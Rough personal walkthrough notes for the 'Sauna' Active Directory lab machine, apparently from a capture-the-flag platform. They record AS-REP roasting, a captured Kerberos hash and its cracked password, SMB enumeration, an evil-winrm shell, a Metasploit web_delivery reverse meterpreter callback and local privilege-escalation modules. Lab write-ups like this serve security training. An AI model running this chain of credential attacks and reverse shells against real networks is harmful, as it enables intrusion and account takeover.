Sauna

Nmap scan:

Kerberos

Kerberoast?
What I did wrong:

You can kerberos based on potential users (from a user page) with no pass to gain access

SMB secure

Can we find user to access it?

Website (Microsoft IIS)

Can we gain access from here?
default credentials?
can we use evil winrm (port 5985)?

Kerberoast with no pass:

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/fsmith

hash:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:d1bcd5f3625c7b622add478d8fa2ba78$6e42f4fb392b684d71bdd565fda2b9e17606fffac94400e33618b3430d25256a964e9f4673b38e878bbbf144eb4710caf7690b5b5a8503a77d021aa3ec524b1ed434f788fb3b129ed55e6d457ccc952bf5dfd4a9540cdf784585afddc5c18c542707cb88e948b7a4e1648f9087a11dc4652c97e8f4f25a94cfc6ad78162006617bdcaf8ea6474ad9b80026c8c2215ecebcb1d4a57775b8fda1f6b2dad5dd0b91de4291a2fea46469a7096c3feeebbfe289f6a7459d49acc749fde6a3c4196764c6873b4add7de5a091211f11d6715e69b5e725af2c13117b9be0769827e300374a8d0b931851400d366e2a0999301dbe3e223966238c457e80f53c7e1b5c5931

Can we crack it?

hashcat -m 13100 egoHash.txt rockyou.txt -O

13100 didn’t work. krb5asrep is 18200!

find it by doing:

hashcat --help | grep Kerberos

hashcat -m 18200 egoHash.txt rockyou.txt -O

cracked user:

fsmith:Thestrokes23

Pass the hash?:

cme smb 192.168.218.0/24 -u fsmith -H Thestrokes23 --local-auth

No, it has to be NTLM hash (we need to crack the hash to

SAM Dump:

cme smb 10.10.10.175 -u fsmith -H Thestrokes23 --local-auth --sam

TGS?

EGOTISTICAL-BANK.local/fsmith

sudo GetUserSPNs.py EGOTISTICAL-BANK.local/fsmith:Thestrokes23 -dc-ip 10.10.10.175 -request

Didn’t work but we found HSmith. Can we kerberoast it?

GetNPUsers.py -dc-ip 10.10.10.175 -no-pass EGOTISTICAL-BANK.local/hsmith

Didn’t work. SMB with user?

enumerate smb shares:

cme smb -u 'fsmith' -p 'Thestrokes23' --shares 10.10.10.175

Access the read shares:

smbclient \\\\10.10.10.175\\NETLOGON -U fsmith%Thestrokes23

smbclient \\\\10.10.10.175\\print$ -U fsmith%Thestrokes23

smbclient \\\\10.10.10.175\\RICOH Aficio SP -U fsmith%Thestrokes23

that’s not a folder! exploit?

on metasploit

Needs a session. Ports open for the server?

NEW:

What is WinRM? Port 5985

WinRM | Metasploit Documentation Penetration Testing Software, Pen Testing Security

Gaining access with metasploit not working. Gain a normal shell then web_delivery?

Update?

use scanner/winrm/winrm_login
run http://fsmith:Thestrokes23@10.10.10.175:5985

set domain EGOTISTICAL-BANK.local
set username fsmith
set password Thestrokes23
set rhost 10.10.10.175
run http://fsmith:Thestrokes23@10.10.10.175:5985

still a no

evil winrm:

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

We get a powershell

use it to go to metasploit (web_delivery):

msfconsole
use exploit/multi/script/web_delivery
set lhost tun0
set payload windows/meterpreter/reverse_http
set target 2 #PSH
set srvport 6999
run -j
sessions -i 1

It hangs. x64?

set payload windows/x64/meterpreter/reverse_http

Worked!

background session and try the escalation:

use it to gain access with user then escalate with

use windows/local/ricoh_driver_privesc
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4445
set session 1
run

Hanging. Try something faster and come back to this if it’s not working?

exploit suggester:

use post/multi/recon/local_exploit_suggester

 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 5   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/cve_2020_17136                           Yes                      The target appears to be vulnerable. A vulnerable Windows 10 v1809 build was detected!                                                                                                                               
 8   exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!                                                                                                                                     
 9   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 12  exploit/windows/local/ricoh_driver_privesc                     Yes                      The target appears to be vulnerable. Ricoh driver directory has full permissions

Purple worked!